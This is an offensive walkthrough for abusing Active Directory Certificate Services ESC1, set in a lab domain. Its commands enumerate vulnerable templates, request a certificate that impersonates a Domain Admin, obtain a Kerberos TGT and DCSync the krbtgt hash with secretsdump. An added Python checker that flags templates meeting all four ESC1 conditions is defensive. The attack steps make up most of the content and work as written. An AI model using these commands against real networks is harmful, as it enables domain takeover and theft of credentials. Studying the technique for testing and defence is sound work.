ESC1

A template is vulnerable to ESC1 when all of the following attribute values are set at the same time:

| Attribute | Value |
| --- | --- |
| msPKI-Certificate-Name-Flag | (0x1) ENROLLEE_SUPPLIES_SUBJECT |
| pKIExtendedKeyUsage | Client Authentication |
| msPKI-Certificate-Application-Policy | Client Authentication |
| Enrollment Rights | Domain Users |

Note that you need the credentials of one valid domain user to enroll for the certificate.

  1. List the available vulnerable templates using Certipy or Certi:
# Certipy
certipy find -u peter@range.net -p Password123 -dc-ip 192.168.86.183 -vulnerable -enabled -stdout
 
# Certi
python3 certi.py list range.net/peter:'Welcome1234' --dc-ip 10.8.0.2 --vuln --enabled
 
# the output should normally look like this
Name: VulnUser
Schema Version: 2
Enroll Services: range-CA01-CA
Vulnerabilities: ESC1 - SAN Impersonation
msPKI-Certificate-Name-Flag: (0x1) ENROLLEE_SUPPLIES_SUBJECT
msPKI-Enrollment-Flag: (0x9) INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
msPKI-RA-Signature: 0
pKIExtendedKeyUsage: Client Authentication, Secure Email, Encrypting File System
msPKI-Certificate-Application-Policy: Client Authentication, Secure Email, Encrypting File System
SD Owner: S-1-5-21-3556610642-5733621-2059236447-500 range\Administrator
Permissions
  Enrollment Permissions
    Enrollment Rights
      S-1-5-21-3556610642-5733621-2059236447-512 range\Domain Admins
      S-1-5-21-3556610642-5733621-2059236447-513 range\Domain Users
      S-1-5-21-3556610642-5733621-2059236447-519 range\Enterprise Admins
[[..snip..]]
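As an added audit check (not part of the original page or of the Certipy project), the following Python parses one template block in the `certipy find -stdout` format shown above and reports a template only when all four conditions from the table hold. Beyond the table, it also accepts the other EKUs that permit domain authentication, and the list of low-privileged groups is an assumption you adapt to your own forest.

```python
import re
# Principals whose enrollment rights expose a template to every domain user (constructed list; extend for your forest).
LOW_PRIV_GROUPS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}
# EKUs that let a certificate authenticate to the domain: the page lists Client Authentication,
# the others are also accepted for Kerberos PKINIT.
AUTH_EKUS = {"Client Authentication", "Smart Card Logon", "PKINIT Client Authentication", "Any Purpose"}

def parse_template(text):
    """Parse one template block of `certipy find -stdout`: top-level 'Key: Value' lines become
    entries; the 'SID domain\\group' lines under 'Enrollment Rights' become a list of group names."""
    tpl, in_enroll = {"Enrollment Rights": []}, False
    for line in text.splitlines():
        s = line.strip()
        if s == "Enrollment Rights":
            in_enroll = True
            continue
        m = re.match(r"^S-1-5-[\d-]+\s+(.+)$", s)  # "S-1-5-21-...-513 range\Domain Users"
        if in_enroll and m:
            tpl["Enrollment Rights"].append(m.group(1).split("\\", 1)[-1])
            continue
        in_enroll = False
        if ":" in s and not line.startswith(" "):
            key, _, value = s.partition(":")
            tpl[key.strip()] = value.strip()
    return tpl

def esc1_findings(tpl):
    """Return the satisfied ESC1 conditions; the template is ESC1 only if all four hold."""
    def names(attr):  # "A, B, C" -> {"A", "B", "C"}
        return {v.strip() for v in tpl.get(attr, "").split(",") if v.strip()}
    hits = []
    if "ENROLLEE_SUPPLIES_SUBJECT" in tpl.get("msPKI-Certificate-Name-Flag", ""):
        hits.append("enrollee supplies the subject/SAN")
    if names("pKIExtendedKeyUsage") & AUTH_EKUS:
        hits.append("authentication EKU")
    if names("msPKI-Certificate-Application-Policy") & AUTH_EKUS:
        hits.append("authentication application policy")
    exposed = set(tpl["Enrollment Rights"]) & LOW_PRIV_GROUPS
    if exposed:
        hits.append("low-privileged enrollment: " + ", ".join(sorted(exposed)))
    return hits if len(hits) == 4 else []
# Sample input: the VulnUser block from the output above, abridged.
SAMPLE = """Name: VulnUser
msPKI-Certificate-Name-Flag: (0x1) ENROLLEE_SUPPLIES_SUBJECT
pKIExtendedKeyUsage: Client Authentication, Secure Email, Encrypting File System
msPKI-Certificate-Application-Policy: Client Authentication, Secure Email, Encrypting File System
    Enrollment Rights
      S-1-5-21-3556610642-5733621-2059236447-512 range\\Domain Admins
      S-1-5-21-3556610642-5733621-2059236447-513 range\\Domain Users
"""
```

An empty result means the template does not meet every ESC1 condition; removing ENROLLEE_SUPPLIES_SUBJECT or restricting Enrollment Rights to privileged groups is enough to clear it.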
  2. If the requirements are met, request a certificate from the vulnerable template using Certi or Certipy, specifying an alternate name that belongs to a high-privileged user (i.e. a Domain Admin):
# Certi
python3 certi.py req range.net/peter:'Welcome1234'@CA01.range.net range-CA01-CA -k -n --template 'VulnUser' --alt-name 'rangeadm'
 
# Certipy
certipy req -u peter@range.net -p Password123 -target ca01.range.net -ca 'range-CA01-CA' -template 'VulnUser' -upn 'Administrator@range.net'
  3. A PFX certificate should now be retrieved. Run the following command to request a TGT with the certificate using gettgtpkinit.py or Certipy:
# impacket
python3 gettgtpkinit.py range.net/rangeadm -cert-pfx /opt/certi/rangeadm@range.net.pfx -pfx-pass 'admin' -dc-ip 10.8.0.2 /tmp/rangeadm.ccache
 
# certipy
certipy auth -pfx administrator.pfx -dc-ip 192.168.86.183
  4. A ccache file should now be retrieved. Export its path in the KRB5CCNAME environment variable and DCSync:
secretsdump.py range.net/rangeadm@10.8.0.2 -k -no-pass -just-dc -just-dc-user 'range\krbtgt'

Note that you could also recover the NTLM hash with the getnthash.py script.